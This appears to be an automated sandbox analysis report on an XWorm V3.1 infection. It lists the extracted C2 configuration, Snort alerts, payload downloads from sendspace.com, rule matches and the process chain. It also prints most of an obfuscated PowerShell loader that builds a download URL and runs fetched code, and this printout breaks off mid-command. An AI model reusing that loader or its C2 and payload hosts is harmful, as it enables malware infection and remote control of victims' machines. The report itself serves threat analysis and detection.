Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: rachesxwdavid.duckdns.org |
Avira URL Cloud: Label: malware |
Source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["rachesxwdavid.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: qm.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdbS source: powershell.exe, 0000000D.00000002.1849045722.00000000081B0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.9:49713 -> 57.128.155.22:8895 |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8895 -> 192.168.2.9:49713 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8895 -> 192.168.2.9:49713 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/tbfvpd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n1.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/dy1f16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n5.sendspace.comConnection: Keep-AliveCookie: SID=asnkose8meuts76a32vtsvb0k7 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: www.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs03n1.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs13n5.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: rachesxwdavid.duckdns.org |
Source: powershell.exe, 0000000D.00000002.1845952673.000000000706B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C82226000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs03n1.sendspace.com |
Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspaX |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspace.com |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C8220F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspace.comx |
Source: wab.exe, 00000011.00000003.1839864776.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/ |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/Ezo8 |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/om:443t |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/yz |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8154F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 00000011.00000002.2594401027.0000000021320000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2582688527.00000000062B1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16 |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16/u28 |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdP |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdXR |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: amsi64_7308.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_7588.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7125 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7125 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelA |